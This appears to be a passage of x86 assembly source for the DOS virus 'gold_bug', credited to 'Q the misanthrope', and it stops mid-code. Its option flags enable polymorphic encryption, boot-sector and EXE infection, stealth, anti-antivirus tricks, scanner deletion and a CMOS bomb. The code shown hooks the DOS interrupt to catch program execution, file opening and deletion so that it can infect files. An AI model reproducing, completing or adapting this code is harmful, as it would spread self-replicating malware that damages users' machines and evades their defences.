cseg segment para public 'code'
gold_bug proc near
assume cs:cseg
;-----------------------------------------------------------------------------
;designed by "Q" the misanthrope.
;-----------------------------------------------------------------------------
.186
TRUE equ 001h
FALSE equ 000h
;-----------------------------------------------------------------------------
;option bytes used and where
DELETE_SCANNERS equ FALSE ; -2 bytes -2 in com_code
CHECK_FOR_8088 equ TRUE ; 4 bytes 4 in com_code
INFECT_RANDOM equ TRUE ; 4 bytes 4 in com_code
CMOS_BOMB equ TRUE ; 4 bytes 4 in com_code
DEFLECT_DELETE equ TRUE ; 5 bytes 5 in com_code
READING_STEALTH equ TRUE ; 5 bytes 5 in com_code
SAME_FILE_DATE equ TRUE ; 24 bytes 24 in com_code
DOUBLE_DECRYPT equ TRUE ; 26 bytes 26 in com_code
EXECUTE_SPAWNED equ TRUE ; 35 bytes 32 in com_code 3 in boot_code
MODEM_CODE equ TRUE ; 40 bytes 29 in com_code 11 in boot_code
ANTI_ANTIVIRUS equ TRUE ; 46 bytes 35 in com_code 11 in boot_code
POLYMORPHIC equ TRUE ; 90 bytes 74 in com_code 16 in boot_code
MULTIPARTITE equ TRUE ;372 bytes 346 in com_code 26 in boot_code
;-----------------------------------------------------------------------------
;floppy boot infection
FLOPPY_1_2M equ 001h
FLOPPY_760K equ 000h
FLOPPY_TYPE equ FLOPPY_1_2M
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
DELETE_SCANNERS equ FALSE
CHECK_FOR_8088 equ FALSE
INFECT_RANDOM equ FALSE
DEFLECT_DELETE equ FALSE
READING_STEALTH equ FALSE
SAME_FILE_DATE equ FALSE
EXECUTE_SPAWNED equ FALSE
POLYMORPHIC equ FALSE
ENDIF
;-----------------------------------------------------------------------------
SECTOR_SIZE equ 00200h
RES_OFFSET equ 0fb00h
COM_OFFSET equ 00100h
RELATIVE_OFFSET equ RES_OFFSET-COM_OFFSET
PART_OFFSET equ COM_OFFSET+SECTOR_SIZE
BOOT_OFFSET equ 07c00h
RELATIVE_BOOT equ BOOT_OFFSET-PART_OFFSET
LOW_JMP_10 equ 0031ch
LOW_JMP_21 equ 00321h
SAVE_INT_CHAIN equ 0032ch
SCRATCH_AREA equ 08000h
HEADER_SEGMENT equ 00034h
INT_21_IS_NOW equ 0cch
BIOS_INT_13 equ 0c6h
NEW_INT_13_LOOP equ 0cdh
BOOT_SECTOR equ 001h
DESCRIPTOR_OFF equ 015h
IF FLOPPY_TYPE EQ FLOPPY_1_2M
DESCRIPTOR equ 0f909h
OLD_BOOT_SECTOR equ 00eh
COM_CODE_SECTOR equ 00dh
ELSE
DESCRIPTOR equ 0f905h
OLD_BOOT_SECTOR equ 005h
COM_CODE_SECTOR equ 004h
ENDIF
READ_ONLY equ 001h
SYSTEM equ 004h
DELTA_RI equ 004h
DSR equ 020h
CTS equ 010h
CD equ 080h
FAR_JUMP equ 0eah
MIN_FILE_SIZE equ 00500h
PSP_SIZE equ 00100h
VIRGIN_INT_13_A equ 00806h
VIRGIN_INT_13_B equ 007b4h
VIRGIN_INT_2F equ 00706h
FAR_JUMP_OFFSET equ 006h
SET_INT_OFFSET equ 007h
CHANGE_SEG_OFF equ 009h
VIDEO_MODE equ 00449h
MONOCHROME equ 007h
COLOR_VIDEO_MEM equ 0b000h
ADDR_MUL equ 004h
SINGLE_BYTE_INT equ 003h
VIDEO_INT equ 010h
VIDEO_INT_ADDR equ VIDEO_INT*ADDR_MUL
DISK_INT equ 013h
DISK_INT_ADDR equ DISK_INT*ADDR_MUL
SERIAL_INT equ 014h
DOS_INT equ 021h
DOS_INT_ADDR equ DOS_INT*ADDR_MUL
MULTIPLEX_INT equ 02fh
COMMAND_LINE equ 080h
FIRST_FCB equ 05ch
SECOND_FCB equ 06ch
NULL equ 00000h
GET_PORT_STATUS equ 00300h
WRITE_TO_PORT equ 00100h
HD_0_HEAD_0 equ 00080h
READ_A_SECTOR equ 00201h
WRITE_A_SECTOR equ 00301h
GET equ 000h
SET equ 001h
DELETE_W_FCB equ 01300h
DEFAULT_DRIVE equ 000h
GET_DEFAULT_DR equ 01900h
DOS_SET_INT equ 02500h
FILE_DATE_TIME equ 05700h
DENYNONE equ 040h
OPEN_W_HANDLE equ 03d00h
READ_W_HANDLE equ 03f00h
WRITE_W_HANDLE equ 04000h
CLOSE_HANDLE equ 03e00h
UNLINK equ 04100h
FILE_ATTRIBUTES equ 04300h
RESIZE_MEMORY equ 04a00h
QUERY_FREE_HMA equ 04a01h
ALLOCATE_HMA equ 04a02h
EXEC_PROGRAM equ 04b00h
GET_ERROR_LEVEL equ 04d00h
TERMINATE_W_ERR equ 04c00h
RENAME_A_FILE equ 05600h
LSEEK_TO_END equ 04202h
CREATE_NEW_FILE equ 05b00h
RESIDENT_LENGTH equ 068h
PARAMETER_TABLE equ 005f1h
MAX_PATH_LENGTH equ 00080h
EXE_HEADER_SIZE equ 020h
NEW_EXE_HEADER equ 00040h
NEW_EXE_OFFSET equ 018h
PKLITE_SIGN equ 'KP'
PKLITE_OFFSET equ 01eh
NO_OF_COM_PORTS equ 004h
WINDOWS_BEGIN equ 01605h
WINDOWS_END equ 01606h
ERROR_IN_EXE equ 0000bh
IF POLYMORPHIC
FILE_SIGNATURE equ 07081h
XOR_SWAP_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+TWO_BYTES
FILE_LEN_OFFSET equ byte ptr ((offset serial_number)-(offset com_code))+THREE_BYTES
FIRST_UNDO_OFF equ byte ptr ((offset first_jmp)-(offset com_code)+ONE_BYTE)
SECOND_UNDO_OFF equ byte ptr ((offset second_jmp)-(offset com_code))
BL_BX_OFFSET equ byte ptr ((offset incbl_incbx)-(offset com_code))
ROTATED_OFFSET equ byte ptr ((offset rotated_code)-(offset com_code))
ELSE
FILE_SIGNATURE equ 0070eh
ENDIF
IF MODEM_CODE
STRING_LENGTH equ byte ptr ((offset partition_sig)-(offset string))
ENDIF
IF EXECUTE_SPAWNED
EXEC_SUBTRACT equ byte ptr ((offset file_name)-(offset exec_table))
ENDIF
DH_OFFSET equ byte ptr ((offset dh_value)-(offset initialize_boot)+TWO_BYTES)
ONE_NIBBLE equ 004h
ONE_BYTE equ 001h
TWO_BYTES equ 002h
THREE_BYTES equ 003h
FOUR_BYTES equ 004h
FIVE_BYTES equ 005h
FIVE_BITS equ 005h
EIGHT_BYTES equ 008h
USING_HARD_DISK equ 080h
KEEP_CF_INTACT equ 002h
CMOS_CRC_ERROR equ 02eh
CMOS_PORT equ 070h
REMOVE_NOP equ 001h
CR equ 00dh
LF equ 00ah
INT3_INCBX equ 043cch
INC_BL equ 0c3feh
INCBX_INCBL_XOR equ INT3_INCBX XOR INC_BL
JMP_NO_SIGN equ 079h
JMP_NOT_ZERO equ 075h
JNS_JNZ_XOR equ JMP_NO_SIGN XOR JMP_NOT_ZERO
CLI_PUSHCS equ 00efah
;-----------------------------------------------------------------------------
video_seg segment at 0c000h
org 00000h
original_int_10 label word
video_seg ends
;-----------------------------------------------------------------------------
io_seg segment at 00070h
org 00893h
original_2f_jmp label word
io_seg ends
;-----------------------------------------------------------------------------
org COM_OFFSET
com_code:
;-----------------------------------------------------------------------------
IF POLYMORPHIC
first_decode proc near
serial_number: xor word ptr ds:[si+bx+FIRST_UNDO_OFF],MIN_FILE_SIZE
org $-REMOVE_NOP
org $-FIVE_BYTES
jmp load_it
org $+TWO_BYTES
rotated_code: int SINGLE_BYTE_INT
into
adc al,0d4h
incbl_incbx: inc bl
first_jmp: jnz serial_number
add bx,si
jns serial_number
first_decode endp
;-----------------------------------------------------------------------------
IF DOUBLE_DECRYPT
second_decode proc near
push si
get_next_byte: lodsw
add bx,ax
inc bx
xor byte ptr ds:[si+SECOND_UNDO_OFF],bl
org $-REMOVE_NOP
dec si
second_jmp: jns get_next_byte
pop si
second_decode endp
ENDIF
ENDIF
;-----------------------------------------------------------------------------
com_start proc near
IF MULTIPARTITE
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_int
mov di,VIRGIN_INT_13_B
call set_both_ints
push cs
pop es
ENDIF
dont_set_int: IF CHECK_FOR_8088
mov cl,RESIDENT_LENGTH
mov al,high(RESIZE_MEMORY)
shl ax,cl
mov bx,cx
int DOS_INT
ELSEIF MULTIPARTITE
mov bx,RESIDENT_LENGTH
mov ah,high(RESIZE_MEMORY)
int DOS_INT
ENDIF
IF EXECUTE_SPAWNED
pusha
call from_com_code+RELATIVE_OFFSET
popa
push cs
pop ds
push cs
pop es
cmpsw
mov dx,si
sub si,EXEC_SUBTRACT
org $-REMOVE_NOP
mov bx,PARAMETER_TABLE
mov di,bx
mov ax,EXEC_PROGRAM
set_table: scasw
movsb
scasb
mov word ptr ds:[di],ds
je set_table
int DOS_INT
mov ah,high(GET_ERROR_LEVEL)
int DOS_INT
mov ah,high(TERMINATE_W_ERR)
ELSEIF MULTIPARTITE
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
ENDIF
IF MULTIPARTITE
int DOS_INT
ELSE
jmp boot_load
ENDIF
com_start endp
;-----------------------------------------------------------------------------
interrupt_21 proc far
pushf
pusha
push ds
push es
mov di,dx
push ds
pop es
cld
mov cx,MAX_PATH_LENGTH
IF MULTIPARTITE
mov si,offset file_name+RELATIVE_OFFSET
ENDIF
IF READING_STEALTH OR DEFLECT_DELETE
mov bx,ax
ENDIF
cmp ax,EXEC_PROGRAM
IF READING_STEALTH
je start_process
cmp ah,high(OPEN_W_HANDLE)
ENDIF
IF DEFLECT_DELETE
je start_process
cmp ah,high(UNLINK)
ENDIF
jne a_return
start_process: xor ax,ax
copy_name: IF MULTIPARTITE
mov bl,byte ptr ds:[di]
mov byte ptr cs:[si],bl
inc si
ENDIF
scasb
loopne copy_name
std
scasw
IF MULTIPARTITE
mov byte ptr cs:[si-FIVE_BYTES],al
ENDIF
mov al,'E'
scasw
jne a_return
mov ah,'X'
scasw
jne a_return
IF MULTIPARTITE
push ds
ENDIF
pusha
call open_close_file
IF SAME_FILE_DATE
mov word ptr cs:[new_time+ONE_BYTE+RELATIVE_OFFSET],cx
mov word ptr cs:[new_date+ONE_BYTE+RELATIVE_OFFSET],dx
ENDIF
or si,si
IF MULTIPARTITE
jnz large_exe_file
cmp word ptr ds:[si],FILE_SIGNATURE
je our_kind
IF INFECT_RANDOM
xor di,bp
jpo our_kind
ENDIF
cmp word ptr ds:[si+NEW_EXE_OFFSET],NEW_EXE_HEADER
jb test_if_open
cmp word ptr ds:[si+PKLITE_OFFSET],PKLITE_SIGN
je test_if_open
ELSE
jz our_kind
ENDIF
large_exe_file: popa
IF MULTIPARTITE
pop ds
ENDIF
IF ANTI_ANTIVIRUS
mov al,'N'
scasb
ja a_return
mov al,'A'
scasb
jne a_return
pop es
pop ds
popa
IF READING_STEALTH OR DEFLECT_DELETE
cmp ah,high(EXEC_PROGRAM)
jne opened_file
ENDIF
popf
IF CMOS_BOMB
mov al,CMOS_CRC_ERROR
out CMOS_PORT,ax
ENDIF
IF DELETE_SCANNERS
mov ah,high(UNLINK)
jmp short old_int_10_21
ELSE
mov al,ERROR_IN_EXE
stc
retf KEEP_CF_INTACT
ENDIF
ELSE